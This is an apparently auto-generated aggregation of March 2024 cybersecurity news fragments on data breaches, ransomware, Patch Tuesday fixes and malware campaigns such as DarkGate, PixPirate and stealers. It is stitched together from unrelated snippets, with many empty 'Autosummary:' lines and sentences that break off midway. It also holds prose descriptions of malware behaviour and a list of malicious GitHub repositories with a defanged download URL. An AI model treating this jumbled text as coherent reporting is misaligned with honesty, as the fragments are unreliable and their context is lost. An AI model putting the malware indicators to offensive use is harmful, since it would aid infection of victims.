— J. A. Guerrero-Saade (@juanandres_gs) March 18, 2024 Some code entries such as ‘/dev/ubiXX’ (refers to Unsorted Block Images (UBI)) and ‘/dev/dm-XX’ suggest the malware can target systems utilizing flash memory like IoT devices, networking devices, and possibly some ICS devices along with virtual block devices associated with LVM. AcidPour uses a similar IOCTL based wiping logic as VPNFilter "dstr" plugin and AcidRain pic.twitter.com/hzVytibRba — J. A. Guerrero-Saade (@juanandres_gs) March 18, 2024 Analogous to AcidRain, there appears to be a different wiping logic for borking certain devices like /dev/dmXX (LVMs, likely RAIDs). "Autosummary:
"Autosummary:
" How to defend against scammers In January, when it warned of tech support and government impersonation scammers using courier services to collect money, the FBI shared the following tips to reduce the risk of falling victim to similar fraud attempts: Do not click on unsolicited pop-ups on your computer, links sent via text messages, or email links and attachments. "Autosummary:
"Autosummary:
"French national unemployment agency France Travail (formerly Pôle emploi) and Cap emploi, a government employment service for people with disabilities, have suffered a data breach that might have exposed personal data of 43 million people. The breach The agencies announced on Wednesday that an intrusion exposed data of jobseekers registered in the last 20 years, as well as those with a candidate profile on the sites. According to Cybermalveillance – a government platform for reporting … More
The post 43 million workers potentially affected in France Travail data breach appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Once installed, it"s capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. "Autosummary:
Its portfolio includes computing products like servers and storage systems, software, telecommunications equipment, and a range of services, including cloud solutions, system integration, and IT consulting services. "Autosummary:
The firm at the center of the British Post Office scandal, said in a Japanese press release that it had discovered the presence of malware on its computers, the potential theft of customer data, and apologised for any concern or inconvenience caused. "Autosummary:
"Autosummary:
"Fujitsu Limited, the largest Japanese IT services provider, has announced that several of the company’s computers have been compromised with malware, leading to a possible data breach. Known details about the Fujitsu data breach The company published the security notice late last Friday, and said that after an internal investigation, they found that files containing personal information and customer information might have been compromised/exfiltrated. The affected computers have been disconnected and the company has strengthened … More
The post Fujitsu finds malware on company systems, investigates possible data breach appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The second-stage PowerShell script, for its part, fetches a new file from Dropbox ("r_enc.bin"), a .NET assembly file in binary form that"s actually an open-source remote access trojan known as TruRat (aka TutRat or C# RAT) with capabilities to record keystrokes, manage files, and facilitate remote control. Also retrieved by the PowerShell script from Dropbox is a VBScript ("info_sc.txt"), which, in turn, is designed to run arbitrary VBScript code retrieved from the cloud storage service, including a PowerShell script ("w568232.ps12x"). "Autosummary:
PoC exploit for critical RCE flaw in Fortra FileCatalyst transfer tool released Pierluigi Paganini March 18, 2024 March 18, 2024 Fortra addressed a critical remote code execution vulnerability impacting its FileCatalyst file transfer product. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Transitioning to memory-safe languages: Challenges and considerations In this Help Net Security interview, Omkhar Arasaratnam, General Manager at the Open Source Security Foundation (OpenSSF), discusses the evolution of memory-safe programming languages and their emergence in response to the limitations of languages like C and C++. LastPass’ CIO vision for driving business strategy, innovation Recently, LastPass appointed Asad Siddiqui as its … More
The post Week in review: Cybersecurity job openings, hackers use 1-day flaws to drop custom Linux malware appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Transitioning to memory-safe languages: Challenges and considerations In this Help Net Security interview, Omkhar Arasaratnam, General Manager at the Open Source Security Foundation (OpenSSF), discusses the evolution of memory-safe programming languages and their emergence in response to the limitations of languages like C and C++. Keyloggers, spyware, and stealers dominate SMB malware detections In 2023, 50% of malware detections for SMBs were keyloggers, spyware and stealers, malware that attackers use to steal data and credentials, according to Sophos. "Autosummary:
Below is the list of Github repositories used in this campaign, which were already taken down by Github: andreastanaj/AVAST andreastanaj/Sound-Booster aymenkort1990/fabfilter BenWebsite/-IObit-Smart-Defrag-Crack Faharnaqvi/VueScan-Crack javisolis123/Voicemod lolusuary/AOMEI-Backupper lolusuary/Daemon-Tools lolusuary/EaseUS-Partition-Master lolusuary/SOOTHE-2 mostofakamaljoy/ccleaner rik0v/ManyCam Roccinhu/Tenorshare-Reiboot Roccinhu/Tenorshare-iCareFone True-Oblivion/AOMEI-Partition-Assistant vaibhavshiledar/droidkit vaibhavshiledar/TOON-BOOM-HARMONY All the repositories used the same download link: hxxps://digitalxnetwork[.]com/INSTALLER%20PA$$WORD%20GIT1HUB1FREE.rar. "Autosummary:
Observed attacking IPs (Cyble) ShadowSyndicate is an opportunistic, financially-motivated threat actor, active since July 2022, who was linked with various degrees of confidence to ransomware strains such as Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus, and Play. "Autosummary:
Scranton School District in Pennsylvania suffered a ransomware attack Pierluigi Paganini March 16, 2024 March 16, 2024 School districts continue to be under attack, schools in Scranton, Pennsylvania, are suffering a ransomware attack. "Autosummary:
“The database allegedly extracted illicitly contains the personal identification data of people currently registered, people previously registered over the last 20 years as well as people not registered on the list of job seekers but having a candidate space on francetravail.fr. "Cyber threats are growing at an unprecedented pace, and the year ahead is fraught with cybercrime and incidents anticipated ahead of the busy election year where over 50 countries head to the polls, according to Mimecast. With new threats like AI and deepfake technology, the stakes are higher than ever to execute a strong cyber defense. Human risk fuels majority of cyber breaches Many human risk factors in particular — which represent today’s biggest cybersecurity … More
The post Human risk factors remain outside of cybersecurity pros’ control appeared first on Help Net Security.
"Autosummary:
74% of all cyber breaches are caused by human factors, including errors, stolen credentials, misuse of access privileges, or social engineering. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
This international financial institution, funded by 190 member countries, is also a major United Nations financial agency headquartered in Washington, D.C. According to a press release published today, the IMF detected the incident in February and is now conducting an investigation to assess the attack"s impact. "Autosummary:
Only three weeks ago, the Cybersecurity and Infrastructure Security Agency (CISA) issued a warning that ALPHV, the ransomware group behind the attack on Change Healthcare, was singling out targets in that sector, saying that “since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized.” In the last year, 36 different ransomware groups are known to have attacked US healthcare targets, and, unusually, the combined contribution of gangs making just a few attacks each vastly outweighs the efforts of big gangs like LockBit and ALPHV.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Microsoft this week pushed out 61 Patch Tuesday updates with no reports of public disclosures or other zero-days affecting the larger ecosystem (Windows, Office, .NET). Though there are three updated packages from February, they"re just informational changes with no further action is required.
The team at Readiness has crafted this helpful infographic outlining the risks associated with each of the March updates.
Autosummary:
In addition to these standard releases, Microsoft issued these “late” additions with its monthly browser update: CVE-2024-26163 : Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability CVE-2024-26167: Microsoft Edge for Android Spoofing Vulnerability CVE-2024-26246: Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability All these updates should have negligible impact on applications that integrate and operate on Chromium. Windows In February, Microsoft released (another) two critical updates (CVE-2024-21407 and CVE-2024-21408) and 39 patches rated as important to the Windows platform that cover the following key components: Windows SQL and OLE DB Provider Windows Hyper-V Windows Kernel This month we do not see any reports of publicly reported vulnerabilities or exploits in the wild, and if you are on a modern Windows 10/11, all these reported security vulnerabilities are difficult to exploit. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (NET Core, .NET Major revisions This month, Microsoft published the following major revisions to past security and feature updates including: CVE-2024-2173, CVE-2024-2174, and CVE-2024-2176: Chromium: CVE-2024-2173 Out of bounds memory access in V8. "Autosummary:
"Any software, e.g., operating system, hypervisor, etc., implementing synchronization primitives through conditional branches without any serializing instruction on that path and running on any microarchitecture (e.g., x86, ARM, RISC-V, etc.), which allows conditional branches to be speculatively executed, is vulnerable to SRCs," VUSec said. "IT leaders consider immutable storage as a must-have in the fight against cyberattacks, according to Scality. Ransomware threats are now understood by organizations to be inevitable. Reports show 1 in 4 organizations that pay a ransom never get their data back, and just 16% are able to recover without paying a ransom. This reinforces immutable data storage’s role as an essential last line of defense within a cybersecurity toolkit. With this type of storage, data … More
The post IT leaders think immutable data storage is an insurance policy against ransomware appeared first on Help Net Security.
"Autosummary:
While a relatively low number (12%) of IT leaders worldwide who currently use immutable data storage do not regard it as “essential” to their cybersecurity strategy, a larger percentage resides in the UK: 24% of UK respondents have deployed it but say it is not essential to their cybersecurity, compared to 11% in France, 9% in the US and 6% in Germany. "Autosummary:
"Autosummary:
" The PowerShell-based stealer is equipped to exfiltrate sensitive data, including user information, location, Wi-Fi profiles, passwords, Roblox IDs, and in-game currency details, to an attacker-controlled server via a Discord webhook. "Autosummary:
"Autosummary:
While the devices used to test the purchased software and services had no performance or security issues and were also running antivirus software, scanning them "revealed" hundreds of issues requiring repair, including "PC Privacy issues," "Junk files," "Crashed Programs," and "Broken Registry issues. "Autosummary:
"Once the Safe Browsing server receives the encrypted hash prefixes from the privacy server, it decrypts the hash prefixes with its private key and then continues to check the server-side list. "Autosummary:
"Autosummary:
Nissan"s latest update confirms some of Akira"s claims, admitting that hackers stole data on some current and former employees, as well as customers of Nissan, Mitsubishi, Renault, Skyline, Infiniti, LDV, and RAM dealerships in the region. "Autosummary:
Investigators also discovered on Vasiliev"s PC other evidence of his closeness to the LockBit ransomware gang: malicious source code, images of usernames and passwords, and screenshots of end-to-end encrypted conversations between Vasiliev and LockBit"s mysterious administrator, LockBitSupp, discussing the extortion of victims. "Perception Point launched its latest innovation, GPThreat Hunter, an addition to the company’s comprehensive security stack. Leveraging the capabilities of OpenAI’s GPT-4 model, GPThreat Hunterre presents a significant leap forward in Perception Point’s ability to autonomously resolve complex security cases with accuracy and speed. Building on the accuracy of its proprietary detection layers that already successfully prevent 99.95% of threats, along with a vast dataset derived from years of human incident response expertise, Perception Point … More
The post Perception Point GPThreat Hunter allows cybersecurity experts to focus on in-depth investigations appeared first on Help Net Security.
"Autosummary:
This development follows Perception Point’s continuous rollout of AI innovations, such as its release to combat advanced QR code phishing (AKA “Quishing”) threats, its GenAI Decoder, an LLM-based model for detecting social engineering attempts like BEC, impersonation and phishing, and more. "A recently fixed SQL injection vulnerability (CVE-2023-48788) in Fortinet’s FortiClient Endpoint Management Server (EMS) solution has apparently piqued the interest of many: Horizon3’s Attack Team means to publish technical details and a proof-of-concept exploit for it next week, and someone is attempting to sell a PoC for less than $300 via GitHub. About CVE-2023-48788 CVE-2023-48788 is one of the several vulnerabilities recently patched by Fortinet. “An improper neutralization of special elements used in an SQL … More
The post Critical FortiClient EMS vulnerability fixed, (fake?) PoC for sale (CVE-2023-48788) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The development arrives as a federal jury in Washington, D.C., convicted Roman Sterlingov, a dual Russian-Swedish national, for his operation of Bitcoin Fog from 2011 through 2021, facilitating the laundering of profits made from the sale of illegal narcotics, computer crimes, stolen identities, and child sexual abuse material. "Autosummary:
It was addressed as part of updates released on November 14, 2023, in the following versions - kubelet v1.28.4 kubelet v1.27.8 kubelet v1.26.11, and kubelet v1.25.16 "A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes," Kubernetes maintainers said in an advisory released at the time. "Autosummary:
Nissan Oceania data breach impacted roughly 100,000 people Pierluigi Paganini March 14, 2024 March 14, 2024 The ransomware attack that hit the systems of Nissan Oceania in December 2023 impacted roughly 100,000 individuals. "Autosummary:
Once the final payload is executed, a series of actions takes place to secure persistence for the ransomware, modify access control lists (ACLs) to deny users permission to delete important malware files and directories, and a scheduled task is created to execute the payload every five minutes. "Autosummary:
Cisco fixed high-severity elevation of privilege and DoS bugs Pierluigi Paganini March 14, 2024 March 14, 2024 Cisco this week addressed high-severity elevation of privilege and denial-of-service (DoS) vulnerabilities in IOS RX software. "Autosummary:
“The phishing campaign employed open redirect URLs from Google Ad technologies to distribute fake Microsoft software installers (.MSI) masquerading as legitimate software, including Apple iTunes, Notion, NVIDIA, and others.” reads the analysis published by Trend Micro.Recent DarkGate campaign exploited Microsoft Windows zero-day Pierluigi Paganini March 14, 2024 March 14, 2024 Researchers recently uncovered a DarkGate campaign in mid-January 2024, which exploited Microsoft zero-day vulnerability. "Autosummary:
Once the final payload is executed, a series of actions takes place to secure persistence for the ransomware, modify access control lists (ACLs) to deny users permission to delete important malware files and directories, and a scheduled task is created to execute the payload every five minutes. "Autosummary:
"In 2023, 50% of malware detections for SMBs were keyloggers, spyware and stealers, malware that attackers use to steal data and credentials, according to Sophos. Attackers subsequently use this stolen information to gain unauthorized remote access, extort victims, deploy ransomware, and more. Ransomware remains primary cyberthreat for SMBs The Sophos report also analyses initial access brokers (IABs)—criminals who specialize in breaking into computer networks. As seen in the report, IABs are using the dark web … More
The post Keyloggers, spyware, and stealers dominate SMB malware detections appeared first on Help Net Security.
"Autosummary:
“There’s a reason that more than 90% of all cyberattacks reported to Sophos in 2023 involved data or credential theft, whether through ransomware attacks, data extortion, unauthorized remote access, or simply data theft,” added Budd. "Autosummary:
For a limited number of victims, threat actors had access to biometric data, health/medical information, email addresses with passwords, usernames with passwords, security questions and answers, digital signatures, and credit card information with security codes. "Autosummary:
Many of those victims, who had their systems paralyzed by Vasiliev between 2021 and 2022, were businesses based in Saskatchewan, Montreal, Newfoundland, and other Canadian states. "Autosummary:
"After gaining access, they then changed the Roku login information for the affected individual Roku accounts, and, in a limited number of cases, attempted to purchase streaming subscriptions," explained Roku. "Autosummary:
"Autosummary:
Acer Philippines disclosed a data breach after a third-party vendor hack Pierluigi Paganini March 13, 2024 March 13, 2024 Acer Philippines disclosed a data breach after employee data was leaked by a threat actor on a hacking forum. "While the results of law enforcement action against ransomware-as-a-service operators Alphv/BlackCat and LockBit are yet to be fully realized, the August 2023 disruption of the Qakbot botnet has had one notable effect: ransomware affiliates have switched to vulnerability exploitation as the primary method of delivering the malware. The switch is obvious to Symantec’s Threat Hunter Team but, unfortunately, it hasn’t been accompanied by a fall in the number of ransomware victims. “Analysis of data from … More
The post The effects of law enforcement takedowns on the ransomware landscape appeared first on Help Net Security.
"Autosummary:
The researchers pointed out other current trends related to ransomware attacks: the attackers’ use of vulnerable drivers (e.g., for disabling security software), legitimate remote desktop tools (AnyDesk, Atera, etc.), custom data exfiltration tools (e.g., Lockbit’s StealBit), and abuse of built-in Windows utilities (e.g., Esentutl, DPAPI) to steal credentials. "Autosummary:
Our emulation-based approach can swiftly de-obfuscate and dissect even the most complex, state-of-the-art, and environment-aware malware in under 15 seconds.Our MetaDefender Platform layers in market-leading and globally trusted technologies to form an easy to deploy, integrated-by-design, defense-in-depth cybersecurity strategy for securing file uploads.In our latest whitepaper OPSWAT CEO and Founder, Benny Czarny, takes a comprehensive look at what it takes to prevent malware threats in today"s ever-evolving file upload security landscape, and a big part of that is understanding where the pitfalls are, and how to avoid them. "Autosummary:
"Usually, the downloader is used to download and install the droppee, and from this point on, the droppee is the main actor conducting all fraudulent operations and the downloader is irrelevant," Somech explained. "Autosummary:
" Claims of 6TB data theft The investigation follows the BlackCat ransomware gang"s claims that they stole 6TB of data from Change Healthcare"s network belonging to "thousands of healthcare providers, insurance providers, pharmacies, etc." They said they stole source code for Change Healthcare solutions and sensitive information from many partners, including the U.S. military"s Tricare healthcare program, the Medicare federal health insurance program, CVS Caremark, MetLife, Health Net, and many other healthcare insurance providers. "Autosummary:
"Autosummary:
This downloader app requests access to risky permissions upon installation, including Accessibility Services, and then proceeds to download and install the second app (named "droppee"), which is the encrypted PixPirate banking malware. "Autosummary:
"Autosummary:
The complex and multi-step infection chain employed by DarkGate operators since mid-January 2024 is summarized in the below diagram: DarkGate infection chain Source: Trend Micro Trend Micro says this campaign employs DarkGate version 6.1.7, which, compared to the older version 5, features XOR-encrypted configuration, new config options, and updates on the command and control (C2) values. "Autosummary:
Malwarebytes Premium earned a perfect score in the latest AVLab Cybersecurity Foundation “Advanced In-The-Wild Malware Test,” catching and stopping 100% of malware samples, outperforming multiple competitors in the field, and continuing a longstanding tradition of proven, perfect protection for users. "While 70% of organizations feel their current security stacks are effective against image-based and QR code phishing attacks, 76% were still compromised in the last 12 months, according to IRONSCALES and Osterman Research. IT pros are highly aware of emerging types of phishing attacks 93% of IT and security professionals are aware of image-based phishing attacks targeting their organizations, and 79% say the same about QR code attacks. 76% of organizations were still compromised by … More
The post Image-based phishing tactics evolve appeared first on Help Net Security.
"Autosummary:
IT pros are highly aware of emerging types of phishing attacks 93% of IT and security professionals are aware of image-based phishing attacks targeting their organizations, and 79% say the same about QR code attacks. "AuditBoard revealed powerful new AI, analytics, and annotation capabilities to help corporate risk, compliance, and assurance teams, including internal audit and SOX functions, improve collaboration with stakeholders, do more with less, and deliver more timely insights. These robust new enhancements to the internal audit, SOX, and controls management capabilities of AuditBoard’s modern connected risk platform deliver relevant insights faster while navigating a dynamic market environment rife with increasing risks, regulations, and business requirements: AuditBoard AI … More
The post AuditBoard unveils AI, analytics, and annotation capabilities to deliver more timely insights appeared first on Help Net Security.
"Autosummary:
"While ChatGPT and Bard have proven to be valuable tools for developers, marketers, and consumers, they also carry the risk of unintentionally exposing sensitive and confidential data. From a security point of view, it always pays to think one step ahead and about what might be coming next. One of the latest breakthroughs in AI technology is “interactive AI”. While generative AI tools can create fresh content, write code, perform calculations, and engage in human-like … More
The post How advances in AI are impacting business cybersecurity appeared first on Help Net Security.
"Autosummary:
While generative AI tools can create fresh content, write code, perform calculations, and engage in human-like conversations, interactive AI can be used for tasks like geolocation and navigation or speech-to-text applications, ushering in the next phase of chatbots and digital assistants.By identifying and understanding how data is stored, used, and moves across an organization and controlling who has access to that data, ensures security teams can quickly respond to threats such as unauthorized access to sensitive data. "CISO / Head of Enterprise IT Stitch Fix | USA | Remote – View job details Reporting directly to the Chief Product and Technology Officer, you will oversee all aspects of information security, including cloud security, DevSecOps, security operations, and security strategy. You’ll also be responsible for all areas of the IT organization, including IT infrastructure, enterprise applications and insights, business systems, employee technology services, and IT analytics. CISO Ultra Maritime | USA | Remote … More
The post Cybersecurity jobs available right now: March 12, 2024 appeared first on Help Net Security.
"Autosummary:
CISO / Head of Enterprise IT Stitch Fix | USA | Remote – View job details Reporting directly to the Chief Product and Technology Officer, you will oversee all aspects of information security, including cloud security, DevSecOps, security operations, and security strategy. Junior-Regular Security Analyst Luxoft Poland | Poland | Hybrid – View job details As a Data Security Analyst, you will serve as an expert in detection, collaborating with the CTO, information security, and customer’s group SOC. "As the April 15, 2024 tax filing deadline approaches in the US, some old and some new tax-related scams targeting both taxpayers and tax professionals. Tax-related scams targeting taxpayers With taxpayers rushing to file their personal federal income tax return, scammers are taking advantage of the commotion to trick people into sending them money or hand out sensitive private information. The Internal Revenue Service (IRS) is warning taxpayers about common IRS impersonation scams, but also … More
The post Tax-related scams escalate as filing deadline approaches appeared first on Help Net Security.
"Autosummary:
To protect themselves from tax-related scams, taxpayers are advised to: Request an Identity Protection PIN before filing the tax return Make sure to access the legitimate IRS website Share personal information only though encrypted channels Only use legitimate tax software and tax preparation services Create strong passwords Enable multi-factor authentication (MFA) Promptly report tax-related schemes, scams, identity theft and fraud The IRS stresses that they will never ask for personal/financial information or Identity Protection PINs through email, text or social media, and will never threaten with lawsuits or arrests. Some additional tax-related scams the IRS is warning about: Tax identity theft – Scammers use a person’s identity number to file a tax return or unemployment compensation and claim refunds – Scammers use a person’s identity number to file a tax return or unemployment compensation and claim refunds Phishing scams – Scammers send convincing emails posing as the IRS to make victims disclose personal and financial information – Scammers send convincing emails posing as the IRS to make victims disclose personal and financial information Unethical tax return preparers (aka “ghost” tax preparers) – Individuals that pose as tax prepaprers but don’t actually file tax returns on behalf of the tax payer despite getting paid for the service. "A financially motivated threat actor is using known vulnerabilities to target public-facing services and deliver custom malware to unpatched Windows and Linux systems. Among the exploited vulnerabilities are also two recently discovered Ivanti Connect Secure VPN flaws that are widely exploited by a variety of attackers. Magnet Goblin activity Magnet Goblin – as the threat actor has been dubbed by Check Point researchers – has been targeting unpatched edge devices and public-facing servers for years. … More
The post Hackers leverage 1-day vulnerabilities to deliver custom Linux malware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
With CTEM, a more thoughtful approach to discovery and prioritization adds value by: Quickly reducing overall risk Increasing the value of each remediation, and potentially freeing up resources Improving the alignment between security and IT teams Providing a common view into the entire process, encouraging a positive feedback loop that drives continuous improvement Getting Started with CTEM Since CTEM is a process rather than a specific service or software solution, getting started is a holistic endeavor. The Five Stages of a CTEM Program Rather than a particular product or service, CTEM is a program that reduces cyber security exposures via five stages: Scoping – According to Gartner, "To define and later refine the scope of the CTEM initiative, security teams need first to understand what is important to their business counterparts, and what impacts (such as a required interruption of a production system) are likely to be severe enough to warrant collaborative remedial effort." In our opinion, a CTEM program helps you: Identify your most exposed assets, along with how an attacker might leverage them Understand the impact and likelihood of potential breaches Prioritize the most urgent risks and vulnerabilities Get actionable recommendations on how to fix them Monitor your security posture continuously and track your progress With a CTEM program, you can get the "attacker"s view", cross referencing flaws in your environment with their likelihood of being used by an attacker. "Autosummary:
The cross-site scripting (XSS) flaw, tracked as CVE-2024-2123 (CVSS score: 7.2), impacts all versions of the plugin, including and prior to 2.8.3. "Autosummary:
Following this, the fake insurer, refusing other methods of payment, alluding to security reasons, provide a payment slip with a QR code containing the payment details and generated through legitimate circuits, distributed throughout the country at authorised points of sale, with the beneficiary’s details in the name of a natural person and not a real insurance agency. "Artificial intelligence (AI), digital transformation, and the Internet of Things have caused a data explosion, leading organizations to grapple with a surging amount of fragmented data where it lives. Rubrik released Rubrik Enterprise Proactive Edition (EPE), a data security product suite that combines DSPM with recovery designed for complete cyber resilience, wherever data lives. Rubrik EPE allows organizations to secure mission-critical data for comprehensive protection, recovery, and resilience against tomorrow’s cyberattacks, whether in a cloud, … More
The post Rubrik EPE secures enterprise data from cyberattacks appeared first on Help Net Security.
"Autosummary:
Core capabilities include: Providing comprehensive visibility across a hybrid environment, from cloud and SaaS to data centers Monitoring data assets to identify sensitive data, protection levels, and user access policies Delivering insight into activities taken on those data sets Discovering misconfigurations for IT and security teams to correct, and thereby reduce inadvertent data exposure “Cyber threats have outpaced most companies’ ability to prevent them. "Claroty released Advanced Anomaly Threat Detection (ATD) Module within the Medigate Platform from Claroty. The new capability provides healthcare organizations with the clinical context to properly identify, assess, and prioritize threats to connected medical devices, IoT, and building management systems (BMS). The capabilities of the Advanced ATD Module are built on Claroty’s specialized knowledge of healthcare environments and foundational, in-depth CPS device visibility, including: Agentless, clinically-aware threat detection and context to address known indicators of … More
The post Claroty Advanced ATD Module provides continuous monitoring of healthcare network risks appeared first on Help Net Security.
"Autosummary:
The capabilities of the Advanced ATD Module are built on Claroty’s specialized knowledge of healthcare environments and foundational, in-depth CPS device visibility, including: Agentless, clinically-aware threat detection and context to address known indicators of compromise in CPS Threat detection at deeper levels of the clinical network beyond areas where firewall solutions are deployed Continuous monitoring of device communication hardening measures and compliance controls According to the Germany-based healthcare network Ortenau Klinikum, with the Advanced ATD Module, “We now know what is in our network at any given minute. "Autosummary:
"Autosummary:
The number of bugs in each vulnerability category is listed below 24 Elevation of Privilege Vulnerabilities 3 Security Feature Bypass Vulnerabilities 18 Remote Code Execution Vulnerabilities 6 Information Disclosure Vulnerabilities 6 Denial of Service Vulnerabilities 2 Spoofing Vulnerabilities The total count of 60 flaws does not include 4 Microsoft Edge flaws fixed on March 7th. "Autosummary:
During security conferences like ESCAL8 and hardwea.io, Google awarded $70,000 for 20 critical discoveries in Wear OS and Android Automotive OS and another $116,000 for 50 reports concerning issues in Nest, Fitbit, and Wearables. "Autosummary:
Known ransomware attacks by gang, February 2024 Known ransomware attacks by country, February 2024 Known ransomware attacks by industry sector, February 2024 In other February news, new reports highlighted ALPHV’s surge of targeted attacks against the healthcare sector. There was substance to the disruption too—some arrests, “a vast amount of intelligence” gathered, infrastructure seized, cryptocurrency accounts frozen, decryption keys captured, and the revelation that LockBit administrator LockBitSupp “has engaged with law enforcement.”But February didn’t just bring unprecedented numbers, but unprecedented developments as well: law enforcement shut down LockBit, the largest ransomware gang, while ALPHV, the second-largest, appeared to fake its demise and abscond with its own affiliates’ funds.“Threats to leak data, sell it online, break other parts of the business, attack related firms, or even harass employees are all tactics gangs can make use of” to force reluctant businesses to pay, writes former Malwarebytes Labs author Christopher Boyd. "On this March 2024 Patch Tuesday, Microsoft has released fixes for 59 CVE-numbered vulnerabilities, but – welcome news! – none of them are currently publicly known or actively exploited. Last month, though, several days after Patch Tuesday, the company updated two advisories to say that those particular vulnerabilities were being exploited in the wild. One of the two – CVE-2024-21338, an elevation of privilege vulnerability affecting the Windows Kernel – had been reported to Microsoft … More
The post March 2024 Patch Tuesday: Microsoft fixes critical bugs in Windows Hyper-V appeared first on Help Net Security.
"Autosummary:
“These mostly include elevation of privilege vulnerabilities including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler), which we often see exploited in the wild as zero-days as part of post-exploitation activity, typically by advanced persistent threat (APT) groups,” he pointed out. "Autosummary:
They include assertions that: election officials regularly update voter registration lists to ensure they’re as accurate and currant as possible various security measures exist to protect the integrity of mail-in ballots, including voter identity checks there are robust safeguards to protect against tampering, with ballots returned via drop box federal, state, and/or local election authorities rigorously test and certify voting machines and equipment for vulnerabilities signature matching, information checks and other measures are designed to protect against voter impersonation and ineligible voters casting a ballot There’s another reason to feel confident in the integrity of elections: in countries like the US, different types of voting machines and registration technologies exist. In 2024 there will be national or regional elections in the US, EU, UK, India, Taiwan, South Africa, Mexico and many other countries.Denial-of-Service (DoS): Distributed Denial-of-Service (DDoS) attacks could block voters from accessing key information that would help them to vote, such as the location of their closest polling station, or information on the main candidates. "This collection of free cybersecurity guides covers a broad range of topics, from resources for developing cybersecurity programs to specific guides for various sectors and organizations. Whether you work for a small business, a large corporation, or a specific industry, these guides provide insights into cybersecurity best practices, strategies to combat threats, and advice for using online services safely. Cybersecurity resource and reference guide This guide compiles U.S. and International resources for developing cybersecurity programs … More
The post 10 free cybersecurity guides you might have missed appeared first on Help Net Security.
"Autosummary:
Guide to Securing Remote Access Software Authored by CISA, NSA, FBI, MS-ISAC, and INCD, this guide offers insights into prevalent exploitations and their related tactics, techniques, and procedures (TTPs). "In this Help Net Security video, Mike Britton, CISO at Abnormal Security, discusses how energy and infrastructure organizations face an increased risk of business email compromise and vendor email compromise attacks. According to Abnormal Security data, from February 2023 to July 2023, the average number of BEC weekly attacks was 0.53 per 1,000 mailboxes. BEC attacks increased by 18% in the following six months, reaching a weekly average of 0.63 attacks per 1,000 mailboxes. Business … More
The post Email security trends in the energy and infrastructure sector appeared first on Help Net Security.
"Autosummary:
"97% of technology leaders find traditional AIOps models are unable to tackle the data overload, according to Dynatrace. Organizations are drowning in data The research reveals that organizations are continuing to embrace multi-cloud environments and cloud-native architectures to enable rapid transformation and deliver secure innovation. However, despite the speed, scale, and agility enabled by these modern cloud ecosystems, organizations are struggling to manage the explosion of data they create. These research findings underscore the need … More
The post Advanced AI, analytics, and automation are vital to tackle tech stack complexity appeared first on Help Net Security.
"Autosummary:
By unifying diverse data, retaining its context, and powering analytics and automation with a hypermodal AI that combines multiple techniques, including causal, predictive, and generative AI, teams can unlock a wealth of insights from their data to drive smarter decision-making, intelligent automation, and more efficient ways of working,” Greifeneder concluded. "Autosummary:
"Autosummary:
"Midnight Blizzard (aka APT29), a group of Russian hackers tied to the country’s Foreign Intelligence Service (SVR), has leveraged information stolen from Microsoft corporate email systems to burrow into the company’s source code repositories and internal systems. “It is apparent that Midnight Blizzard is attempting to use secrets of different types it has found. Some of these secrets were shared between customers and Microsoft in email, and as we discover them in our exfiltrated email, … More
The post Microsoft: Russian hackers accessed internal systems, code repositories appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"After multiple failed attempts to execute their standard Go backdoor, the threat actor pivoted to living-off-the-land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their Go backdoor," security researchers Justin Timothy, Gabe Renfro, and Keven Murphy said. "Autosummary:
“Similarly, when an AdminServer connection is made by OpenEdge Explorer (OEE) and OpenEdge Management (OEM), it also utilizes the OS local authentication provider on supported platforms to grant user-id and password logins that may also lead to unauthorized login access.” "Autosummary:
These include: Magento – CVE-2022-24086 – CVE-2022-24086 Qlik Sense – CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 – CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 Ivanti Connect Secure – CVE-2023-46805 and CVE-2024-21887, CVE-2024-21888 and CVE-2024-21893. The researchers also observed a simplified version of the NerbianRAT, called MiniNerbian, which supports the following actions: Execute C2’s command and return results Update activity schedule (full day or specific hours) Update configuration Unlike NerbianRAT, MiniNerbian uses HTTP protocol for C2 communication. "Autosummary:
“These injections serve as handlers for various Popup Builder events such as sgpb-ShouldOpen, sgpb-ShouldClose, sgpb-WillOpen, sgpbDidOpen, sgpbWillClose, sgpb-DidClose. "Autosummary:
"As data breaches continue to expose sensitive healthcare information, with over 118 million patients impacted in the United States in 2023, Cynerio has extended its commitment to enhancing cybersecurity in the healthcare sector. With a focus on addressing critical cybersecurity challenges, Cynerio epands its Healthcare Cybersecurity Platform to safeguard patient data and combat escalating cyber threats. The four primary areas of focus include: 1. Safeguarding healthcare information with patient data security: Cynerio’s Patient Data Security … More
The post Cynerio extends Healthcare Cybersecurity Platform to improve patient data protections appeared first on Help Net Security.
"Autosummary:
Stopping healthcare-focused cyber attacks with Network Detection + Response: In response to the escalating cyber threats targeting healthcare, Cynerio’s Network Detection + Response technology offers rapid deployment, day-one protections, validation of alerts, and response times measured in seconds. "Autosummary:
